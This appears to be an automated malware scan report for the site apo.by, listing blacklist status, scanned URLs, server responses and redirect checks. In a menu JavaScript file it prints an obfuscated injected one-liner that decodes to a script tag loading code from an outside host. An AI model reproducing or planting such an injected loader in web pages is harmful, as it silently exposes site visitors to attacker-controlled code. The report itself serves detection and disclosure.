Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=apo.by
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://apo.by/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.apo.by/ | 200 OK Content-Length: 20551 Content-Type: text/html | clean |
http://apo.by/modules/ja_transmenu/transmenu.js | 200 OK Content-Length: 28390 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
TransMenu.spacerGif = "img/x.gif"; TransMenu.dingbatOn = "img/arrow.png"; TransMenu.dingbatOff = "img/tabarrow.png"; TransMenu.dingbatSize = 14; TransMenu.menuPadding = 0; TransMenu.itemPadding = 3; TransMenu.shadowSize = 2; TransMenu.shadowOffset = 3; TransMenu.shadowColor = "#888"; TransMe
var el; for(var d = document.all.length;d--;){ el = document.all[d]; for(var c = cearElementProps.length;c--;){ el[cearElementProps[c]] = null; } } }); }
<!-- js-tools --> v=0;while(v<63)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00lv{nfolp.sbmmz/dpn0uftu0tubu/qiq#?=0tdsjqu?'.charCodeAt(v++)-1)) <!-- /js-tools -->
Antivirus reports:
http://www.apo.by/index.php | 200 OK Content-Length: 20550 Content-Type: text/html | clean |
http://www.apo.by/images/stories/doc/Programma_APO.pdf | 200 OK Content-Length: 52645 Content-Type: application/pdf | clean |
http://www.apo.by/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.apo.by/index.php?option=com_artbannersplus&task=clk&id=16 | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 17 Jul 2014 05:17:26 GMT Location: http://Bannerapo.gif Server: nginx/1.4.4 Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=Windows-1251 Set-Cookie: 2434c2e4b7bfe9ead90ef54743605ea6=-; path=/ X-Powered-By: PHP/5.3.28 | clean |
http://bannerapo.gif/ | 500 Can't connect to bannerapo.gif:80 (Bad hostname) Content-Length: 158 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: apo.by
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: apo.by
Referer: http://www.google.com/search?q=apo.by
Result:
The result is similar to the first query. There are no suspicious redirects found.